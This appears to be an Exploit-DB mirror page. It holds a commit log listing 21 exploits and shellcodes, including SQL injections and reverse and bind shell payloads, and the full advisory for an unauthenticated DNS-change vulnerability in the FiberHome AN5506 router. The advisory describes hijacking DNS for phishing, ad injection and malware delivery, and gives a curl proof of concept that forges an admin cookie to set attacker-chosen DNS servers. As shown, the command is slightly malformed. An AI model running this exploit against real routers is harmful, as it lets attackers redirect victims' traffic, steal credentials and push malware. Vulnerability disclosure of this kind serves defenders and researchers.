d12dffd438
21 changes to exploits/shellcodes Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation Joomla! Component JEXTN Membership 3.1.0 - 'usr_plan' SQL Injection Event Manager 1.0 - SQL Injection Fancy Clone Script - 'search_browse_product' SQL Injection Real Estate Custom Script - 'route' SQL Injection Advance Loan Management System - 'id' SQL Injection IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Joomla! Component JEXTN Classified 1.0.0 - 'sid' SQL Injection Joomla! Component Jimtawl 2.1.6 - Arbitrary File Upload Joomla! Component JMS Music 1.1.1 - SQL Injection Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal FiberHome AN5506 - Unauthenticated Remote DNS Change Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes) Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes) Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode Linux/x64 - Custom Encoded XOR + Polymorphic + execve(/bin/sh) Shellcode (Generator) Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
54 lines
No EOL
1.8 KiB
Text
54 lines
No EOL
1.8 KiB
Text
# FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability
|
|
#
|
|
# Software Version RP2617
|
|
# Device Model AN5506-04-F
|
|
# Vendor Homepage: www.fiberhome.com/
|
|
#
|
|
#
|
|
# Date: 01/02/2018
|
|
# Exploit Author: r0ots3c
|
|
# http://wandoelmo.com.br
|
|
# https://www.facebook.com/wsec.info
|
|
#
|
|
# Description:
|
|
# Vulnerability exists in web interface
|
|
# This router has vulnerabilities where you can get information or edit
|
|
configurations in an unauthenticated way.
|
|
# The biggest risk is the possibility of changing the dns of the device.
|
|
#
|
|
# Modifying systems' DNS settings allows cybercriminals to
|
|
# perform malicious activities like:
|
|
#
|
|
# o Steering unknowing users to bad sites:
|
|
# These sites can be phishing pages that
|
|
# spoof well-known sites in order to
|
|
# trick users into handing out sensitive
|
|
# information.
|
|
#
|
|
# o Replacing ads on legitimate sites:
|
|
# Visiting certain sites can serve users
|
|
# with infected systems a different set
|
|
# of ads from those whose systems are
|
|
# not infected.
|
|
#
|
|
# o Controlling and redirecting network traffic:
|
|
# Users of infected systems may not be granted
|
|
# access to download important OS and software
|
|
# updates from vendors like Microsoft and from
|
|
# their respective security vendors.
|
|
#
|
|
# o Pushing additional malware:
|
|
# Infected systems are more prone to other
|
|
# malware infections (e.g., FAKEAV infection).
|
|
#
|
|
#
|
|
|
|
Proof of Concept:
|
|
|
|
VIA CURL:
|
|
curl 'http://<TARGET>/goform/setDhcp' -H 'Cookie: loginName=admin' -H
|
|
--data
|
|
'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=<MALICIOUS
|
|
DNS1>dhcpSecDns=<MALICIOUS
|
|
DNS2>&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text='
|
|
--compressed -k -i |